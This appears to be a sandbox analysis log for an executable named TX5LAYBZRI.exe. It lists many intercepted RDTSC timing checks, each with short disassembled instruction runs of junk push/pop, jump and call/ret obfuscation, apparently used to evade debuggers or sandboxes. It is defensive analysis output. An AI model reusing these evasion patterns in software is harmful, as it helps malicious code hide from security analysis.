Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1491F0D second address: 1491F13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1492079 second address: 149207F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1494A76 second address: 1494A86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF10887397Bh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1494A86 second address: 1494A9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF108C7BF11h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1494B40 second address: 1494B54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF108873980h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1495266 second address: 1495276 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF108C7BF0Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1495276 second address: 1495283 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1495283 second address: 149528C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 149528C second address: 1495290 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14956E1 second address: 14956E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14956E6 second address: 14956EB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1495BD2 second address: 1495BF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF108C7BF14h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1495BF0 second address: 1495BF6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1495BF6 second address: 1495BFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1495BFC second address: 1495C00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1495C00 second address: 1495C04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1495D81 second address: 1495D85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14962A4 second address: 14962A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14962A8 second address: 149630B instructions: 0x00000000 rdtsc 0x00000002 je 00007FF108873976h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov edi, dword ptr [ebp+122D179Fh] 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007FF108873978h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 00000014h 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push edi 0x00000032 call 00007FF108873978h 0x00000037 pop edi 0x00000038 mov dword ptr [esp+04h], edi 0x0000003c add dword ptr [esp+04h], 0000001Bh 0x00000044 inc edi 0x00000045 push edi 0x00000046 ret 0x00000047 pop edi 0x00000048 ret 0x00000049 xchg eax, ebx 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007FF10887397Ch 0x00000051 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 1497DF6 second address: 1497E6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 jns 00007FF108C7BF06h 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007FF108C7BF08h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a mov esi, dword ptr [ebp+122D243Ch] 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push eax 0x00000035 call 00007FF108C7BF08h 0x0000003a pop eax 0x0000003b mov dword ptr [esp+04h], eax 0x0000003f add dword ptr [esp+04h], 00000019h 0x00000047 inc eax 0x00000048 push eax 0x00000049 ret 0x0000004a pop eax 0x0000004b ret 0x0000004c jmp 00007FF108C7BF0Fh 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 jnp 00007FF108C7BF0Ch 0x0000005a jnl 00007FF108C7BF06h 0x00000060 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 1497E6B second address: 1497E71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 1497E71 second address: 1497E75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 1448993 second address: 14489B1 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF108873976h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF108873982h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14489B1 second address: 14489B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 149A91E second address: 149A928 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FF108873976h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 149F2A2 second address: 149F2A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 149F2A6 second address: 149F2AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 149F2AA second address: 149F2B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 149F2B0 second address: 149F2BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FF108873976h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 149F2BA second address: 149F2EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108C7BF0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov dword ptr [ebp+122D2C6Ah], edi 0x00000012 push 00000000h 0x00000014 clc 0x00000015 push 00000000h 0x00000017 sub dword ptr [ebp+122D242Eh], edx 0x0000001d xchg eax, esi 0x0000001e push eax 0x0000001f push edx 0x00000020 push esi 0x00000021 ja 00007FF108C7BF06h 0x00000027 pop esi 0x00000028 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 149F2EA second address: 149F2EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 149F2EF second address: 149F300 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jnc 00007FF108C7BF0Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 149F300 second address: 149F31D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FF108873987h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14A23FE second address: 14A2404 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14A39B5 second address: 14A39D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF10887397Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF10887397Eh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14A39D8 second address: 14A3A40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108C7BF19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FF108C7BF08h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov dword ptr [ebp+1245C628h], ebx 0x0000002a push 00000000h 0x0000002c pushad 0x0000002d jns 00007FF108C7BF06h 0x00000033 xor bx, 97DFh 0x00000038 popad 0x00000039 mov ebx, dword ptr [ebp+122D1E8Dh] 0x0000003f push 00000000h 0x00000041 mov di, 45DBh 0x00000045 xchg eax, esi 0x00000046 push edx 0x00000047 push eax 0x00000048 push eax 0x00000049 pop eax 0x0000004a pop eax 0x0000004b pop edx 0x0000004c push eax 0x0000004d pushad 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14A3A40 second address: 14A3A44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14A5A5C second address: 14A5A66 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14A5A66 second address: 14A5AB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007FF108873978h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 movzx edi, si 0x00000025 mov edi, dword ptr [ebp+122D2CA6h] 0x0000002b mov dword ptr [ebp+122D17B2h], ebx 0x00000031 push 00000000h 0x00000033 mov edi, dword ptr [ebp+122D2AD3h] 0x00000039 push 00000000h 0x0000003b mov bx, C135h 0x0000003f xchg eax, esi 0x00000040 push ebx 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14A5AB5 second address: 14A5AB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14A7C51 second address: 14A7C57 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14A7C57 second address: 14A7C5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14A7C5D second address: 14A7C61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14A7C61 second address: 14A7C85 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF108C7BF06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF108C7BF13h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14A7C85 second address: 14A7C9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108873983h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14A7C9C second address: 14A7CA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14A7CA2 second address: 14A7CA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14ACE54 second address: 14ACE5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14ACE5A second address: 14ACEA9 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF108873976h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007FF108873978h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 sbb di, F73Ah 0x0000002e sub dword ptr [ebp+122D3727h], edi 0x00000034 push 00000000h 0x00000036 add edi, 55F87DB5h 0x0000003c push 00000000h 0x0000003e mov bx, di 0x00000041 push eax 0x00000042 pushad 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14ADDA5 second address: 14ADDAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14ADDAB second address: 14ADDB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14ADDB1 second address: 14ADE4D instructions: 0x00000000 rdtsc 0x00000002 je 00007FF108C7BF06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007FF108C7BF18h 0x00000012 nop 0x00000013 mov di, A6A5h 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ebx 0x0000001c call 00007FF108C7BF08h 0x00000021 pop ebx 0x00000022 mov dword ptr [esp+04h], ebx 0x00000026 add dword ptr [esp+04h], 00000018h 0x0000002e inc ebx 0x0000002f push ebx 0x00000030 ret 0x00000031 pop ebx 0x00000032 ret 0x00000033 jc 00007FF108C7BF0Ah 0x00000039 mov di, 835Fh 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push eax 0x00000042 call 00007FF108C7BF08h 0x00000047 pop eax 0x00000048 mov dword ptr [esp+04h], eax 0x0000004c add dword ptr [esp+04h], 00000017h 0x00000054 inc eax 0x00000055 push eax 0x00000056 ret 0x00000057 pop eax 0x00000058 ret 0x00000059 sub ebx, dword ptr [ebp+122D1A35h] 0x0000005f xchg eax, esi 0x00000060 jmp 00007FF108C7BF0Eh 0x00000065 push eax 0x00000066 push eax 0x00000067 push edx 0x00000068 jmp 00007FF108C7BF0Dh 0x0000006d rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14AFF7C second address: 14AFF82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14AFF82 second address: 14AFF9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FF108C7BF06h 0x0000000a jng 00007FF108C7BF06h 0x00000010 popad 0x00000011 pushad 0x00000012 jnp 00007FF108C7BF06h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 144A4C3 second address: 144A4E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 jmp 00007FF108873986h 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 144A4E2 second address: 144A4F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FF108C7BF0Fh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 144A4F7 second address: 144A515 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108873984h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14B0640 second address: 14B064A instructions: 0x00000000 rdtsc 0x00000002 je 00007FF108C7BF0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 149CFF2 second address: 149CFFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 149F50B second address: 149F511 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 149F511 second address: 149F517 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14B8DB2 second address: 14B8DE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007FF108C7BF06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FF108C7BF18h 0x00000012 pushad 0x00000013 popad 0x00000014 js 00007FF108C7BF06h 0x0000001a popad 0x0000001b push ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14A0581 second address: 14A058A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14A2BA8 second address: 14A2BB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FF108C7BF06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14A4AE6 second address: 14A4AF7 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF108873976h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14B891A second address: 14B8923 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14A4AF7 second address: 14A4AFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14A4AFC second address: 14A4B02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14A4BC7 second address: 14A4BCD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14A4BCD second address: 14A4BD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14A4BD2 second address: 14A4BE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007FF108873976h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14A6BB6 second address: 14A6BBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14A6BBC second address: 14A6BC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14A6C83 second address: 14A6C89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14A7EFB second address: 14A7F05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14A8E93 second address: 14A8E97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14A8E97 second address: 14A8EA8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007FF108873978h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14BD208 second address: 14BD20C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14BD20C second address: 14BD216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14BD2A8 second address: 14BD2AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14AB037 second address: 14AB03C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14AB03C second address: 14AB05E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108C7BF18h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14ABF81 second address: 14ABF8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FF108873976h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 14ADFE4 second address: 14ADFF7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF108C7BF08h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edi 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
